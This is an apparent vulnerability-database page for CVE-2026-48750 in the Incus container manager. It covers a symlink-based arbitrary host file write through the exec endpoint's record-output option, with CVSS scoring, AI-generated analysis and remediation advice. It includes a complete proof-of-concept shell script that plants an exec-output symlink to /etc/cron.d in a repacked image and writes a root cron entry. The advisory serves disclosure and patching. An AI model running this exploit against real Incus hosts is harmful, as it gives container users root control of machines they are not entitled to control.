Skip to main content

Incus CVE-2026-48750

CRITICAL
External Control of File Name or Path (CWE-73)
2026-06-26 https://github.com/lxc/incus GHSA-73hr-m85f-64v9
9.9
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.9 CRITICAL
AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
vuln.today AI
9.9 CRITICAL

Authenticated API user (PR:L) reliably writes attacker-controlled files to the host, escaping the instance (S:C) to gain root code execution with full C/I/A impact.

3.1 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jun 26, 2026 - 19:21 vuln.today
Analysis Generated
Jun 26, 2026 - 19:21 vuln.today
CVE Published
Jun 26, 2026 - 18:32 github-advisory
CRITICAL 9.9

DescriptionGitHub Advisory

Summary

The record-output parameter of the /instances/$name/exec endpoint stores the output of the command in the exec-output directory of the instance. If exec-output is a symlink, file named exec_UUID.stdout and exec_UUID.stderr can be written to an arbitrary location where the .stdout file will contain arbitrary content. This behavior can be abused for arbitrary command execution.

Details

When an image is unpacked, top-level symlinks are extracted as is; allowing for exec-output to be placed on disk. In instance_exec.go, os.Mkdir continues of exec-output exists and os.OpenFile follows the exec-output symlink.

PoC

Below, we place the exec_UUID.stdout file in /etc/cron.d on the host for arbitrary command execution.

#!/bin/sh
# usage: $0 existing-imagefp
set -eu

basefp="${1}"

die() {
        printf '%s' "${@}" >&2
        exit 1
}

command -v curl >/dev/null 2>&1 || die 'error: curl not found\n'
command -v python3 >/dev/null 2>&1 || die 'error: python3 not found\n'

tmpdir=$(mktemp -d)
cleanup() {
        rm -rf "${tmpdir}"
}
trap cleanup EXIT INT QUIT TERM HUP
# insert exec-output symlink

incus image export "${basefp}" "${tmpdir}/img"

mkdir "${tmpdir}/repack"
cd "${tmpdir}/repack"

xz -cd "${tmpdir}/img" | tar -f- -vx

rm -rf exec-output
ln -s /etc/cron.d exec-output

tar -f- -c * | gzip -c9 >"${tmpdir}/img"

cd - >/dev/null
incus image import "${tmpdir}"/img* --alias afw-exec-output
# Launch container, exec with record-output via REST API
incus launch afw-exec-output afw-exec-output
incus wait afw-exec-output ip

OP=$(curl -s --unix-socket /var/lib/incus/unix.socket \
  -X POST -H 'Content-Type: application/json' \
  -d '{"command":["/bin/sh","-c","echo * * * * * root id'"'>'"'/afw-exec-output"],"record-output":true}' \
  "lxd/1.0/instances/afw-exec-output/exec" | python3 -c "import sys,json;print(json.load(sys.stdin)['operation'])")

curl -s --unix-socket /var/lib/incus/unix.socket "$OP/wait?timeout=30" >/dev/null

#find /etc/cron.d/exec_* -exec cat {} \;

Impact

Constrained file creation in an arbitrary directory on the host via via an unsanitized symlink; possibly leading to command execution.

AnalysisAI

Host-side arbitrary file write in Incus (the LXD-fork container and VM manager) before 7.2.0 lets an attacker who can supply a crafted image and call the instance exec endpoint write attacker-controlled content to any path on the host, leading to root-level command execution. A top-level exec-output symlink packed into an image survives image unpacking, and when record-output:true is passed to /instances/$name/exec the daemon follows that symlink to write exec_UUID.stdout/.stderr outside the instance - for example into /etc/cron.d. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain authorized Incus API access
Delivery
Import crafted image with exec-output symlink
Exploit
Launch instance from malicious image
Install
Call exec with record-output:true
C2
Daemon follows symlink, writes file to /etc/cron.d
Execute
Cron executes payload as root
Impact
Full host compromise

Vulnerability AssessmentAI

Exploitation Exploitation requires (1) authenticated access to the Incus API sufficient to import an image and create/launch an instance, and (2) the ability to call the `/instances/$name/exec` endpoint with the `record-output` parameter set to true. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The published CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, base 9.9) reflects genuine severity: the scope change plus high impact captures the container-to-host root escape. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A lower-privileged but authorized Incus user crafts an image containing a top-level `exec-output` symlink pointing to a sensitive host directory such as `/etc/cron.d`, imports it, and launches a container from it. They then call `/instances/$name/exec` with `record-output:true` running a command whose stdout is a valid cron line; the daemon follows the symlink and writes `exec_UUID.stdout` into `/etc/cron.d`, and cron later executes the attacker's command as root on the host. …
Remediation Upgrade to Incus 7.2.0 or later, which contains the fix (Vendor-released patch: 7.2.0); rebuild or repackage any distribution packages that bundle the incusd daemon from github.com/lxc/incus/v7. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Identify all Incus installations prior to version 7.2.0 and restrict access to the exec endpoint via firewall rules. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-48750 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy